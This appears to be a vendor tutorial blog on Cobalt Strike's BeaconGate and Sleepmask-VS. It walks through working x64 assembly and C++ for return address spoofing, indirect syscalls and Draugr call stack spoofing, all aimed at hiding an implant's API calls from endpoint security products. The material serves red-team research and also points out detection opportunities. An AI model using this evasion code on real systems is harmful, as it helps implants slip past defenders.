TL;DR: In this blog we’ll demonstrate how to instrument Beacon via BeaconGate and walk through our implementations of return address spoofing, indirect syscalls, and a call stack spoofing technique, Draugr, that are now available in Sleepmask-VS. Furthermore, we’ll provide tips and tricks for developers in getting set up with Sleepmask-VS so they can write their own custom call gates.

BeaconGate

Raphael Mudge, the creator of Cobalt Strike, recently released a blog outlining his reflections on security research over the last decade. One key takeaway from this blog was the importance of tools which enable security researchers to quickly test and incorporate a hypothesis into the attack chain. This has always been the magic of Cobalt Strike, from BOFs to UDRLs, as it provides a vehicle for weaponizing an offensive technique and highlighting defensive blind spots as part of a full attack chain. This is one of the key principles still driving Cobalt Strike development; we are passionate about making tooling for security researchers to push the boundaries and to feed the security conversation. 
 
Call stack spoofing is one such example. When I wrote my initial CallStackSpoofer PoC, there was very little public tooling which supported call stack spoofing. For example, the only viable way to embed custom techniques into an attack chain with Cobalt Strike was via a UDRL, as it makes it possible to instrument Beacon at runtime via IAT hooking. Whilst this approach is extremely powerful, it relies on custom loading strategies and developing PIC, which means it can have a high barrier to entry. Hence, the OODA loop for call stack spoofing tradecraft can be slow and painful to iterate on. 

In Cobalt Strike 4.10 we introduced BeaconGate, which was aimed at solving this problem. BeaconGate enables users to customise how WinAPI functions are called by Beacon. With BeaconGate configued, Beacon will proxy its Windows API calls to be executed via the Sleepmask (i.e. similar to a remote procedure call).  

Fig 1. A high-level schematic of how BeaconGate works.

As you can now add custom instrumentation via the Sleepmask BOF to functions other than Sleep, it is therefore possible to completely change Beacon’s runtime behaviour by simply loading in different Sleepmasks. In this sense, BeaconGate can be seen as a BOF alternative to IAT-style hooking used by UDRLs such as TitanLdr. Instead of having to develop complex PIC + IAT hooking logic, users can simply configure Malleable C2 (stage.beacon_gate) to proxy functions of interest and use their own custom Sleepmask BOF. 

Furthermore, as part of Cobalt Strike 4.10, we also released Sleepmask-VS, which provides a full mocking and development template for writing custom call gates with BeaconGate. This makes it much simpler (and quicker) to develop custom call stack spoofing routines and bake them directly into Cobalt Strike’s attack chain. 

As part of this blog release, we have now updated Sleepmask-VS to contain three different BeaconGate PoC examples: 

  • Return address spoofing 
  • Indirect syscalls 
  • A port of NtDallas’ Draugr call stack spoofing 

In this blog, we will walk through our implementations of the three techniques listed above. In doing so we aim to demonstrate the software contract used by BeaconGate and show how it can be used to quickly PoC, debug, and weaponise your own custom call stack spoofing routines in Cobalt Strike. 

Getting Started With BeaconGate

The best way to start hacking with BeaconGate is to clone Sleepmask-VS

Note: If you download the repo as a zip there are some extra steps you will need to perform; see the README for more guidance. 

The main requirement for the latest Sleepmask-VS release is that you will now need to install the C++ Clang tools for Windows for Visual Studio. We have added a Clang dependency because many call stack spoofing routines require assembly stubs and Clang supports inline asm for X64, making development much simpler. As a consequence, the examples released as part of this blog will not compile out the box with compilers that do not support X64 inline asm. 

To install Clang, open Visual Studio and go to Tools->Get Tools and Features and select the C++ Clang tools for Windows checkbox, as shown below. You will then need to select Modify and restart Visual Studio for it to update.

Fig 2. The Visual Studio Installer GUI showing the C++ Clang tools for Windows checkbox.

Once you have successfully installed Clang and confirmed Sleepmask-VS successfully builds, you are in a position to start debugging and developing custom call gates.

Note: The switch to Clang in Sleepmask-VS has resulted in IntelliSense occasionally throwing erroneous errors within the Visual Studio solution. This is because IntelliSense typically analyzes the code based on the MSVC compiler and hence it doesn’t understand Clang’s inline asm syntax etc.

By default, the Sleepmask-VS debug build will start running the default-sleepmask.exe.  To debug a different Sleepmask you will need to right click the sleepmask-vs solution, and select Properties->Debugging. Here you can edit the Command parameter to launch different debug Sleepmasks as shown below: 

Fig 3. The Sleepmask-VS Property Pages for Debugging. This allows users to modify the Command which is run for the Debug build. This can be modified to run the debug .exe of different Sleepmasks.

Note: Ensure your configuration is the Active(Debug) build (as opposed to Release) as illustrated in the red box above. 

Additionally, Sleepmask-VS makes it easy to step through inline asm; you can set a breakpoint on your target asm function stub and hit Alt+8 to trigger the Disassembly window and F11 to step through, as demonstrated below:

Fig 4. A screenshot showing Visual Studio‘s Disassembly window, which can be used to step through inline asm.

How BeaconGate Works

When Beacon attempts to call a supported API, such as VirtualAlloc (see the full supported API set here), it will:

  1. Check if BeaconGate has been enabled for the target function.
  2. If so, Beacon will pack the call into a FUNCTION_CALL structure and then invoke the Sleepmask (passing the FUNCTION_CALL).
  3. The Sleepmask will then execute the target WinAPI via whatever implementation the user desires.

The full definition of the FUNCTION_CALL struct can be found below:

typedef struct _FUNCTION_CALL { 
    PVOID functionPtr;  // Ptr to target function to call 
    WinApi function;  // Enum representing target WinApi 
    int numOfArgs;  // Number of arguments 
    ULONG_PTR args[MAX_BEACON_GATE_ARGUMENTS]; //Array of arguments 
    BOOL bMask;  // Do you want to mask Beacon? 
    ULONG_PTR retValue;  // Return value (this must be filled in)
} FUNCTION_CALL, * PFUNCTION_CALL;

Sleepmask-VS allows us to debug/step through the entry point of the Sleepmask, as shown in the screenshot below:

Fig 5. The entry point of the default Sleepmask being debugged in Sleepmask-VS.

In this example, the Sleepmask has been invoked and received a pointer to a FUNCTION_CALL structure. This shows that Beacon wants to call kernel32!VirtualAlloc and that there are four arguments passed, which in turn can be found in the args array. The args array is analogous to a CONTEXT structure, in that rcx == arg[0], rdx == arg[1] etc. 

By default, BeaconGate is just a generic function dispatcher based on Railgun. It will simply cast the functionCall->functionPtr to be a generic function pointer for the given number of arguments and call it (i.e. retValue = beaconGate(04) (arg(0), arg(1), arg(2), arg(3));). However, the FUNCTION_CALL structure contains all the information needed to execute the ‘atomic’ function, and hence there are much more interesting things we can do, as this blog will demonstrate.

API Monitor

We can start by demonstrating a very basic example of using BeaconGate as an API monitor for Beacon. Firstly, we need to enable BeaconGate in our Malleable C2 profile. This can be done via adding the following to the stage block:

stage {
        [ ... ]
        beacon_gate {
            All;
        }
}

Secondly, we can enable verbose logging in release builds for all our custom Sleepmasks in Sleepmask-VS via setting the ENABLE_LOGGING define in debug.h, as shown below:

Fig 6. A screenshot of debug.h showing the ENABLE_LOGGING define which can be used to enable verbose logging in release builds of custom Sleepmasks.

With this enabled, all Sleepmask logging will use OutputDebugString and hence can be viewed via using SysInternals’ DebugView or via attaching a debugger such as WinDbg. By compiling the Sleepmask BOF with logging enabled, we immediately get run time visibility into what Beacon is calling under the hood via BeaconGate. Hence, you can view all supported API activity without needing to use something like APIMonitor

Note: You can also view Sleepmask debug logging via attaching to a process hosting Beacon with WinDbg / x64Dbg. This has the added advantage that you can also set breakpoints on specific functions (e.g. bp ntdll!NtAllocateVirtualMemory). This is particularly useful when sanity checking call stack spoofing techniques as we will see later. 

We can now rebuild the release build and load the sleepmask.cna script into the Cobalt Strike client (Cobalt Strike->Script Manager->Load). This will present a new GUI option (Sleepmask) which will allow you to select which Sleepmask you would like to apply to all exported Beacon payloads:

Fig 7. A screenshot showing the sleepmask.cna script loaded into the Cobalt Strike client. This script will add a new GUI option which enables users to configure which Sleepmask is automatically applied to all exported Beacon payloads.

For this first example, we will stick with the default-sleepmask with logging enabled. If we generate and execute a new Beacon payload, we can open Dbgview and observe Beacon’s runtime behaviour. For example, running the BOF below (virtualalloc.x64.o) generates the corresponding debug output shown in DbgView.

void go(char* args, int len) { 
    LPVOID pBuffer = BeaconVirtualAlloc(NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 
    if (pBuffer) { 
        BeaconPrintf(CALLBACK_OUTPUT, “Allocated memory at: %p”, pBuffer); 
    } 
    else { 
        BeaconPrintf(CALLBACK_ERROR, “Failed to allocate memory”); 
    } 
}
Fig 8. A screenshot showing the debug logging of the default-sleepmask BOF captured in DebugView. The output shows that a call to VirtualAlloc was proxied by Beacon to the Sleepmask.

When BeaconVirtualAlloc is called, Beacon will check if BeaconGate has been enabled for the target function and if so, it will pack the function call and dispatch it to the Sleepmask to be executed . The idea behind this is that you can route all your sensitive BOF APIs to your custom call gate/call stack spoofing routine to avoid code duplication. This flow is demonstrated in the diagram below:

Fig 9. The high-level execution flow of Beacon<WinAPI> calls (i.e. BeaconVirtualAlloc) being proxied to BeaconGate.

Return Address Spoofing

The second example we will cover in this blog is return address spoofing. The idea behind our implementation is that we want to apply return address spoofing automatically to every WinAPI proxied by Beacon. The obvious use case for this would be to ensure that Beacon’s WinAPI calls do not originate from unbacked memory to bypass a particular security product. 

It is worth considering how it would be possible to achieve this through IAT hooking in a UDRL. We would need to place IAT hooks for every suspicious function we anticipated Beacon would use, re-write a short wrapper for every hooked function, and then re-direct them to our spoofing call gate. Furthermore, given the recent detection interest in anomalous call stacks, the list of suspicious functions may only grow. This could become quite painful from a UDRL developer’s perspective.

However, using BeaconGate we can apply return address spoofing for every proxied WinApi call with very little effort (i.e. we don’t really care what API we’re calling, we just want to apply technique X to it). 
 
We discussed in the ‘How BeaconGate Works’ section that, by default, BeaconGate is a simple function dispatcher. It will simply cast the functionCall->functionPtr to be a generic function pointer for the given number of arguments and call it. For example, if the functionCall->functionPtr contains the address of VirtualAlloc, it will cast the address of VirtualAlloc as a function pointer with four arguments and call it.  

However, there is nothing stopping us from overwriting this function pointer and hence re-directing execution flow somewhere else.  Therefore, we can apply return address spoofing universally by simply overwriting the functionCall->functionPtr to point at our return address spoofing routine. The normal default BeaconGate dispatcher will handle the arguments, meaning that we can apply return address spoofing to any function forwarded by Beacon with minimal effort. We can then tweak what functions we apply return address spoofing to via the stage.beacon_gate Malleable C2 option. 

Note: A nice trick is that if we set our asm function/stub to be variadic (i.e. DoSyscall(...)) the compiler will handle passing the correct number of arguments for us. 

At a high-level then, to implement return address spoofing within BeaconGate, we need to: 

  • Find a gadget in the current process (typically one that jumps based on a non-volatile register, e.g. jmp [rbx]
  • Redirect all incoming WinAPI calls to the return address spoofing stub 

Note: In our implementation, we also check what the incoming function is and locate an appropriate gadget for it (i.e. InternetConnectA will only use a gadget found in WinINet.dll). 

Our X64 return address spoofing implementation can be seen below:

typedef struct _RET_SPOOF_INFO {
    void* RopGadget;          //0
    void* TargetFunction;           //8
    void* RestoreRegister;          //16
    void* OriginalRetAddress;       //24
} RET_SPOOF_INFO, * PRET_SPOOF_INFO;

/**
*  A modified version of Namaszo's X64 Return Address Spoofer.
*
* Ref: https://www.unknowncheats.me/forum/anti-cheat-bypass/268039-x64-return-address-spoofing-source-explanation.html
* Ref: https://github.com/kyleavery/AceLdr

* @param (...) means this asm stub can be called with a variable number of args.
*
* Returns a ULONG_PTR with the result from the target function.
*/
#ifdef _WIN64
// This attribute ensures the compiler generates code without prolog / epilog code.
__attribute__((naked))
ULONG_PTR SpoofReturnAddressx64(...) {
    __asm {
        pop r11    // Save the real return address to r11
        mov rax, gRetSpoofInfo    // Get ptr to global gRetSpoofInfo struct (RET_SPOOF_INFO)
        mov r10, [rax]    // Store the trampoline gadget in r10 (gRetSpoofInfo->RopGadget / +0)
        push r10    // Push trampoline gadget to stack
        mov r10, [rax + 0x8]    // Save target function into r10 (gRetSpoofInfo->TargetFunction / +8)
        mov [rax + 0x18], r11    // Save the original return address to gRetSpoofInfo->OriginalRetAddress / +24
        mov [rax + 0x10], rbx    // Store the original value of rbx in gRetSpoofInfo->RestoreRegister
        
        lea rbx, [rip + 0x9]    // Load the effective address of our cleanup code (x64 allows rip relative addressing - sub rsp, 0x8)
        mov [rax], rbx    // Save ptr to clean up in gRetSpoofInfo->RopGadget / +0 (this will overwrite original gadget)
        mov  rbx, rax    // Set rbx to gRetSpoofInfo, the jmp [rbx] gadget will dereference and jump to cleanup code
        jmp r10    // Execute the target function

        push [rbx + 0x18]    // Need to push original ret address to fix stack (gRetSpoofInfo->OriginalRetAddress / +24)
        mov rbx, [rbx + 0x10]    // Restore the original rbx value from gRetSpoofInfo->RestoreRegister / +16)
        ret
    }
}

Note: Our return address spoofing stub is variadic so that it can be called through the standard BeaconGate call gate and hence uses a global structure RET_SPOOF_INFO (accessed via gRetSpoofInfo) to configure it. This was by design so that we do not need to re-write the BeaconGate dispatcher logic (found in sleepmask-vs/library/gate.cpp). It could be refactored to not use globals, but you would need to re-write the dispatcher code. This is the approach the draugr-sleepmask uses, see sleepmask-vs/library/stackspoofing.cpp. Additionally, this approach has the advantage that we do not need to pass configuration parameters as arguments to the stub or modify the shadow stack.

The screenshot below shows a Beacon payload being instrumented by the retaddrspoofing-sleepmask BOF (with logging enabled): 

Fig 10. A screenshot showing Beacon being instrumented with the retaddrspoofing-sleepmask BOF. In this example, we have attached WinDbg to the Beacon process and set a breakpoint on KERNELBASE!VirtualAlloc. We then executed the virtualalloc.x64.o BOF via inline-execute, which triggered the breakpoint. The knf command in WinDbg is then used to display the call stack, showing return address spoofing in action.

Indirect Syscalls

The third example we will cover is implementing indirect syscalls in BeaconGate. Before diving into the implementation details, it is important to stress that BeaconGate was intended to be as flexible as possible. Hence, Beacon will always proxy the higher-level API call (as opposed to the Nt* / syscall equivalent). The rationale behind this design choice was that if direct / indirect syscalls ever become irrelevant, an operator does not need to re-create the whole ‘clean’ stack chain upwards. 
 
However, this does mean that in order to implement custom syscall techniques, we need to expose a translation layer between the higher and lower-level function for performing syscalls (i.e. from VirtualAlloc to NtAllocateVirtualMemory). Our implementation of this translation layer can be found in sleepmask-vs/library/syscallapi.cpp.  

The high-level flow is that the Sleepmask will check what function Beacon is proxying and forward it to the appropriate wrapper function. The wrapper function is responsible for doing any necessary translation between the high-level and low-level API. For some APIs this is trivial, as you simply ‘pass through’ the arguments to the syscall. However, some do require significant modification (e.g. OpenProcess –> NtOpenProcess).  

An example of this flow for GetThreadContext can be seen below.

// 1. The sleep_mask is passed a FUNCTION_CALL structure which is passed in turn to the SysCallDispatcher.
void sleep_mask(PSLEEPMASK_INFO info, PFUNCTION_CALL functionCall) {
    [ ... ]
    if (info->reason == DEFAULT_SLEEP || info->reason == PIVOT_SLEEP) {
        DLOGF("SLEEPMASK: Sleeping\n");
        SleepMaskWrapper(info);
    }
    else if (info->reason == BEACON_GATE) {
            [ ... ]
            DLOGF("SLEEPMASK: Routing call to its sys call equivalent and executing indirect syscall...\n", winApiArray[functionCall->function]);
            SysCallDispatcher(info, functionCall);
    }
}

// 2. The SysCallDispatcher will check the incoming function and route it to relevant low level wrapper.
void SysCallDispatcher(PSLEEPMASK_INFO info, PFUNCTION_CALL functionCall) {
    [...] 
    else if (functionCall->function == WinApi::GETTHREADCONTEXT) NtGetContextThreadWrapper(functionCall); 
    [...] 
}

// 3. The wrapper function will perform the necessary translation of arguments and execute the syscall.
/**
* GetThreadContext --> NtGetContextThread
*
*    arg[0] [in] HANDLE hThread           -->   [0] [in] HANDLE ThreadHandle
*    arg[1] [in, out] LPCONTEXT lpContext -->   [1] [OUT] PCONTEXT pContext
*/
void NtGetContextThreadWrapper(PFUNCTION_CALL functionCall) {
    NTSTATUS ntStatus = 0;

    ntStatus = _NtGetContextThread((HANDLE)functionCall->args[0], (PCONTEXT)functionCall->args[1]);
    if (NT_SUCCESS(ntStatus)) {
        functionCall->retValue = TRUE;
    }
    else {
        functionCall->retValue = FALSE;
    }
}

In summary, after the Sleepmask is invoked, the FUNCTION_CALL structure is passed to the SysCallDispatcher, which will in turn check what the incoming function is and route it to the appropriate wrapper function (in this case NtGetContextThreadWrapper). This function then simply ‘passes through’ the arguments (functionCall->args[0] etc.) to the lower-level API call (_NtGetContextThread) without any modification.

The _NtGetContextThread function is defined as an extern and so it is up to the user to expose / implement it for their specific call gate. Hence, you can plug in your own techniques without needing to modify / touch the translation layer.  

For our indirect syscall implementation (found in indirectsyscalls.cpp), NtGetContextThread looks like the below:

NTSTATUS _NtGetContextThread(HANDLE ThreadHandle, PCONTEXT ThreadContext) {
    PrepareSyscall(gSysCallInfo->syscalls.ntGetContextThread.sysnum, gSysCallInfo->syscalls.ntGetContextThread.jmpAddr);
    return  DoSyscall(ThreadHandle, ThreadContext);
}

Note: Our implementation uses BeaconGetSysCallInformation on initialization to resolve all the required syscall numbers and jump addresses. These are then referenced via a global pointer (gSysCallInfo). This design choice made the _Nt* API interface cleaner (i.e. you don’t need to also pass pointers to syscall numbers), however this is just our example implementation and it could be refactored to avoid using globals. 

The PrepareSyscall/DoSyscall pattern was inspired by RecycledGate. PrepareSyscall sets the target jump address and syscall number and DoSyscall is a short asm stub which performs the actual jump to the target syscall, as shown below:

#define DoSyscall DoIndirectSyscallx64

/**
* Sets the globals currentJmpAddr/SysNum to target sys call.
*
* Note: This is inspired by RecycledGate:
* https://github.com/thefLink/RecycledGate/blob/main/Sample/Main.c#L95-L96
* however, it uses C instead of ASM to avoid the compiler
* overwriting the r10/r11 registers between calls.
*
* @param DWORD sysNum for current sys call.
* @param PVOID addr target jump address for sys call.
*/
void PrepareSyscall(DWORD sysNum, PVOID addr) {
    currentJmpAddr = addr;
    currentSysNum = sysNum;
}

/**
* x64 ASM stub for indirect sys call gate.
*
* @param (...) means this asm stub can be called with a variable number of args.
* @return NTSTATUS.
*/
__attribute__((naked))
NTSTATUS DoIndirectSyscallx64(...) {
    __asm {
        int 3
        mov r11, currentJmpAddr
        mov eax, currentSysNum
        mov r10, rcx
        jmp r11
    }
}

The screenshot below shows a Beacon payload which is being instrumented by the indirectsyscalls-sleepmask BOF. In this case however, we have compiled a __debugbreak()/int 3 at the start of the DoIndirectSyscallx64 stub. Once again, we can execute the virtualalloc.x64.o BOF, which will in turn trigger a breakpoint just before the NtAllocateVirtualMemory indirect syscall is about to be made:

Fig 11. A screenshot showing an int 3 breakpoint being hit in WinDbg for a Beacon being instrumented with the indirectsyscalls-sleepmask BOF. This breakpoint has been compiled into the indirect syscall stub, DoSyscall.  At this point we can hit F11 to step through our asm stub and walk through the indirect syscall as it is executed.

Draugr

The final example this blog will cover is Draugr. This is a call stack spoofing technique based on LoudSunRun, which is essentially a combination of return address spoofing with a fake stack prepended to make it appear legitimate. This last example is intended to demonstrate how to quickly port an existing open-source technique into BeaconGate.  

As such, we have attempted to minimally modify the original PoC, however, we did have to make a couple of changes to make it more robust:

  • One thing to be aware of for call stack spoofing, whatever technique you implement, is that your top / ‘spoofed’ frame must be big enough to hold all the required arguments. If not, then you risk blitzing the call stack. As an example, to support ten arguments you will need a function that allocates at least 0x80 bytes ( [return address] + [32 bytes of shadow space] + [arg 5] + [arg6] + etc.). Our port of Draugr will only use gadgets which are found in functions with a stack space over this amount.
  • The X64 opcode parsing in Draugr was based on my initial unwinding code in CallStackSpoofer. This is the bare minimum implementation needed for most spoofed stacks, but occasionally Draugr would find gadgets where the function used more exotic unwind codes (in particular UWOP_SAVE_xmm128) which would occasionally cause crashes. Our PoC version ignores any gadgets found in functions which use these unwind codes.

Below is a screenshot of Beacon being instrumented with the draugr-sleepmask BOF:

Fig 12. A screenshot showing Beacon being instrumented with the draugr-sleepmask. In this example, we have attached WinDbg to the Beacon process and set a breakpoint on ntdll!NtAllocateVirtualMemory. We then executed the virtualalloc.x64.o BOF, which triggered the breakpoint. The knf command in WinDbg is then used to display the call stack, showing the fake call stack produced by Draugr.

Note: While Draugr generates a ‘legitimate’ looking call stack it will still have an entry which returns to a gadget. This gadget will typically point to an arbitrary location within a function where the gadget was found. Therefore, it will not be proceeded by a legit call instruction and hence could be a detection opportunity (see image_rop):

0:002> knf 
 #   Memory  Child-SP          RetAddr               Call Site 
00           00000000`00c7e558 00007ffa`7e56e978     ntdll!NtAllocateVirtualMemory 
01         8 00000000`00c7e560 00007ffa`7e5417dc     KERNELBASE!VirtualAlloc+0x48 
02        40 00000000`00c7e5a0 00007ffa`7f1f7374     KERNELBASE!CreateFileInternal+0x34c  //This is gadget 
03       170 00000000`00c7e710 00007ffa`80edcc91     KERNEL32!BaseThreadInitThunk+0x14 
04        30 00000000`00c7e740 00000000`00000000     ntdll!RtlUserThreadStart+0x21

0:002> db 00007ffa`7e5417dc L2    // Display 2 bytes at 00007ffa`7e5417dc
00007ffa`7e5417dc  ff 23    // jmp [rbx] 

0:002> uf 00007ffa`7e5417dc    // Disassemble function at gadget address (00007ffa`7e5417dc)
KERNELBASE!CreateFileInternal: 
[ … ] 
00007ffa`7e5417d5 0f8467ffffff    je      KERNELBASE!CreateFileInternal+0x2b2 (00007ffa`7e541742)  Branch 

KERNELBASE!CreateFileInternal+0x34b: 

00007ffa`7e5417db 81ff230000c0    cmp     edi,0C0000023h    // Gadget is pointing to the middle of this instruction

00007ffa`7e5417e1 0f845bffffff    je      KERNELBASE!CreateFileInternal+0x2b2 (00007ffa`7e541742)  Branch

Taking It Further

The examples given in this blog post are intended primarily to show how BeaconGate works, how flexible it is, and to demonstrate how to get up and running with it. However, the sky is the limit in terms of emulating threat actors. For example, some malware will attempt to proxy suspicious API calls via an OS callback to obtain a ‘clean’ call stack. This can be emulated in BeaconGate, as demonstrated in the screenshot below, which shows a PoC Sleepmask proxying WinAPI calls through the thread pool:

Fig 13. A screenshot showing Beacon being instrumented with a PoC Sleepmask which will proxy all calls through the thread pool. For this example, we have set a breakpoint on ntdll!NtAllocateVirtualMemory. We then once again executed the virtualalloc.x64.o BOF, which triggered the breakpoint. The knf command in WinDbg is then used to display the call stack, showing that the call has been executed by the thread pool (ntdll!TppWorkerThread).

Alternatively, this approach could be quickly modified to use another callback (callback site:learn.microsoft.com can produce interesting results). Be aware though that these can be easily signaturable

Note: The callback function may have restrictions on the max number of arguments that it supports before the stack is corrupted, which can limit the use of these techniques for general purpose call gates (for example, for TppWorkExecuteCallback it is 6). You can work out the size of a given function’s stack frame via the WinDbg .fnent ntdll!TppWorkpExecuteCallback command. However, you will still need to calculate the size of the various unwind codes

Another good example is porting instrumentation hooks which were previously implemented as part of a UDRL into BeaconGate. For example, we could quickly port TitanLdr’s VirtualAllocEx hook into BeaconGate, which maps a copy of \\KnownDlls\\ntdll and resolves any target functions via a clean ntdll to avoid hooks. 

As a final example of how we could potentially instrument Beacon, one common feature request for Beacon is for some form of random user browsing behaviour. With BeaconGate you can subscribe to a hook for InternetConnectA (for HTTP beacons). At this point, you could actually make a number of other ‘random’ requests via HttpOpenRequest if desired, add additional custom jitters, or even wait for user activity before checking in. As this last example suggests, we can start to think of BeaconGate as a generic instrumentation BOF for Beacon

Development Tips

To start developing your own custom call gate BOFs you will need to add a new .cpp file to the root directory. As with BOF-VS, Sleepmask-VS will compile any BOFs in the root directory automatically. This BOF will be the main entry point of your custom Sleepmask and will hence need to expose the sleep_mask(PSLEEPMASK_INFO info, PFUNCTION_CALL functionCall) entry point. 
 
If you add new library code, you will also need to include it in your main entry point. As an example, for indirectsyscalls-sleepmask.cpp we needed to add the following:

/* Additional includes for sys call code. */ 
#include "library\syscallapi.cpp" 
#include "library\indirectsyscalls.cpp"

To test everything is working as expected, we have provided some unit-tests in Sleepmask-VS. These will run by default when any of the example Sleepmasks are run in debug mode (i.e. without a debugger attached /Start Without Debugging), as shown below:

Fig 14. A screenshot showing the unit tests which are run by default for each debug exe.

Furthermore, there is also a unit test BOF provided which can be run once a custom call gate has been applied to an exported Beacon payload. This will call all the Beacon<WinAPI> functions and check that values are returned as expected. The sleepmask.cna script will automatically register a new command run_beacongate_tests which will execute this unit test BOF. This is demonstrated in the screenshot below:

Fig 15. A screenshot showing the run_beacongate_tests command in action.

Lastly, the make file has been adjusted to build with the /A flag to force a build of all targets. This was to solve previous issues of the template needing to be constantly cleaned and rebuilt to get the latest changes. 

Closing Thoughts

The objective of this blog was to demonstrate how BeaconGate can be used to quickly develop custom run time instrumentation for Beacon, with a focus on call stack spoofing techniques. Furthermore, because we can implement this via the Sleepmask BOF and Malleable C2, it provides an equally powerful and more user-friendly alternative to instrumenting Beacon with a UDRL via IAT hooking and PIC stubs. Additionally, while this blog has focused on call stack spoofing, BeaconGate can be thought of as a general instrumentation framework for all supported APIs (think Frida for Beacon!). Hence, it is also possible to instrument Beacon’s network comms (i.e. only send data when a user is active, send random requests pre any beaconing etc.), perform custom cleanup actions on ExitThread etc. Lastly, we have demonstrated how Sleepmask-VS can be used to aid the development process for PoC’ing, debugging and testing custom call gates.